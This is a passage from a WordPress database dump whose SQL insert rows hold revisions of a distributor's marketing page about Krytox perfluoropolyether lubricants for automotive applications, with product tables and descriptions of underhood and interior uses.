href="https://www.miller-stephenson.com/product/krytox-gpl-214/">Krytox™ GPL 214</a></td>\n<td>Grease with extreme pressure additive</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 294</td>\n<td>Grease with extreme pressure and anti-corrosion additives</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">Krytox™ XP2A4</a></td>\n<td>Grease with soluble additive corrosion inhibitor</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2045/">Krytox™ AUT 2045</a></td>\n<td>White, buttery additive-free grease</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a></td>\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2a45/">Krytox™ AUT 2A45</a></td>\n<td>Grease with soluble additive corrosion inhibitor</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a></td>\n<td>White, buttery additive-free grease</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">Krytox™ GPL 215</a></td>\n<td>Grease with extreme pressure additive</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ GPL 295</td>\n<td>Grease with extreme pressure and anti-corrosion additives</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">Krytox™ XP2A5</a></td>\n<td>Grease with soluble additive corrosion inhibitor</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n<tr>\n<td>Krytox™ XP2C5</td>\n<td>Grease with anti-corrosion and anti-fretting additives</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\n</tr>\n</tbody>\n</table>\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\n\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\n\n<strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong>\n\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.\n\n<strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong>\n\nFan Clutch\n\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\n\nO-Ring Lubrication/Assembly Lube\n\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\n\nAlternator\n\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\n\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\n\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\n\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\n\nEGR Valve\n\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\n\nFigure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications\n\n<img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" />\n\nSpark Plug Boots\n\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\n\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\n\n<strong>The following Krytox lubricants are great automotive lubricants:</strong>\n\n[ux_product_categories ids="96,98,97,37,168" number="10"]\n\n<a href="https://www.miller-stephenson.com/krytox-automotive/">To learn more about non-bearing applications please click here.</a>\n\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">To learn more about Krytox GPL greases and oils, please click here. </a>\n\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">To learn more about Krytox AUT greases please click here. </a>\n\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">To learn more about Krytox XP bearing greases please click here.</a>\n\n&nbsp;', 'Krytox Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-autosave-v1', '', '', '2016-10-12 12:54:44', '2016-10-12 12:54:44', '', 2390, 'https://www.miller-stephenson.com/2390-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2397, 2, '2016-10-07 16:58:02', '2016-10-07 16:58:02', '', 'automotive-lubricants', '', 'inherit', 'closed', 'closed', '', 'automotive-lubricants', '', '', '2016-10-07 16:58:02', '2016-10-07 16:58:02', '', 2390, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2398, 53, '2016-10-07 17:03:17', '2016-10-07 17:03:17', '', '', '', 'publish', 'closed', 'closed', '', '2398', '', '', '2016-10-07 17:03:17', '2016-10-07 17:03:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/2398/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2399, 2, '2016-10-07 17:08:37', '2016-10-07 17:08:37', '', 'Automotive Lubricants', '', 'inherit', 'closed', 'closed', '', 'shutterstock_295221404', '', '', '2016-10-07 17:08:58', '2016-10-07 17:08:58', '', 2390, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_295221404.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2400, 2, '2016-10-07 17:11:24', '2016-10-07 17:11:24', '<strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong>\r\n\r\nPowered by Chemours Science… Over the last fifty years, Krytox™ performance lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\r\n\r\n<strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong>\r\n\r\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\r\n\r\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n\r\nLonger Lasting Lubrication\r\n\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n\r\n<strong>The Right Choice for Your Design Challenge</strong>\r\n\r\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong>\r\n<ul>\r\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\r\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\r\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\r\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\r\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\r\n</ul>\r\n<strong>The Right Choice for Our Environment</strong>\r\n\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n\r\n<strong>Effective Over a Wide Temperature Range</strong>\r\n\r\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\r\n\r\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Grade</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 224</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n<td style="text-align: center;">60/9</td>\r\n<td style="text-align: center;">180 °C (356 °F)</td>\r\n<td style="text-align: center;">4,900+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2245</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n<td style="text-align: center;">100/12.3</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,500+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 225</td>\r\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\r\n<td style="text-align: center;">160/18</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,000+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XHT AC</td>\r\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\r\n<td style="text-align: center;">500/47</td>\r\n<td style="text-align: center;">250 °C (482 °F)</td>\r\n<td style="text-align: center;">2,000+</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Compatibility with Elastomers and Plastics</strong>\r\n\r\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\r\n<ul>\r\n 	<li>Fluorosilicone</li>\r\n 	<li>Hytrel® Polyester Elastomer</li>\r\n 	<li>Delrin® Acetal</li>\r\n 	<li>Ethylacrylate</li>\r\n 	<li>Methyl Silicone</li>\r\n 	<li>Butyl 325</li>\r\n 	<li>Neoprene WRT</li>\r\n 	<li>Kalrez® Fluoroelastomer*</li>\r\n 	<li>Zytel® Nylon</li>\r\n 	<li>Viton™ A Fluoroelastomer</li>\r\n 	<li>Nycar 100 (Buna N)</li>\r\n 	<li>Vespel®</li>\r\n 	<li>Urethane</li>\r\n 	<li>Hypalon® Synthetic Rubber</li>\r\n 	<li>EPT Peroxide Cure</li>\r\n 	<li>Hydrocarbon Rubber</li>\r\n 	<li>Teflon™ Fluoropolymer</li>\r\n</ul>\r\n<strong>Compatibility with Metals</strong>\r\n\r\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\r\n\r\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\r\n\r\n<strong>Robust Electrical Properties</strong>\r\n\r\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\r\n\r\n<strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong>\r\n\r\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\r\n\r\n<strong>Cost-Effective</strong>\r\n\r\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.\r\n\r\nFigure 2 Krytox™ Performance Lubricants Product Range\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250">Typical Automotive Lubricants Grade</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 104</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 105</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 1045</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 204</td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 214</td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 224</td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 294</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2A4</td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2045</td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2245</td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2E45</td>\r\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2A45</td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 205</td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 215</td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 225</td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 295</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2A5</td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2C5</td>\r\n<td>Grease with anti-corrosion and anti-fretting additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\r\n\r\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\r\n\r\n<strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong>\r\n\r\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.\r\n\r\n<strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong>\r\n\r\nFan Clutch\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\nO-Ring Lubrication/Assembly Lube\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\r\n\r\nAlternator\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\r\n\r\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\r\n\r\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\r\n\r\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\r\n\r\nEGR Valve\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\nFigure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications\r\n\r\n<img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" />\r\n\r\nSpark Plug Boots\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\r\n\r\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\r\n\r\n<strong>The following Krytox lubricants are great automotive lubricants:</strong>\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Automotive Lubricants" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Krytox Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-revision-v1', '', '', '2016-10-07 17:11:24', '2016-10-07 17:11:24', '', 2390, 'https://www.miller-stephenson.com/2390-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2401, 2, '2016-10-07 17:14:19', '2016-10-07 17:14:19', '<strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong>\r\n\r\nPowered by Chemours Science… Over the last fifty years, Krytox™ performance lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\r\n\r\n<strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong>\r\n\r\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\r\n\r\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n\r\nLonger Lasting Lubrication\r\n\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n\r\n<strong>The Right Choice for Your Design Challenge</strong>\r\n\r\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong>\r\n<ul>\r\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\r\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\r\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\r\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\r\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\r\n</ul>\r\n<strong>The Right Choice for Our Environment</strong>\r\n\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n\r\n<strong>Effective Over a Wide Temperature Range</strong>\r\n\r\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\r\n\r\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Grade</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 224</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n<td style="text-align: center;">60/9</td>\r\n<td style="text-align: center;">180 °C (356 °F)</td>\r\n<td style="text-align: center;">4,900+</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 2245</td>\r\n<td 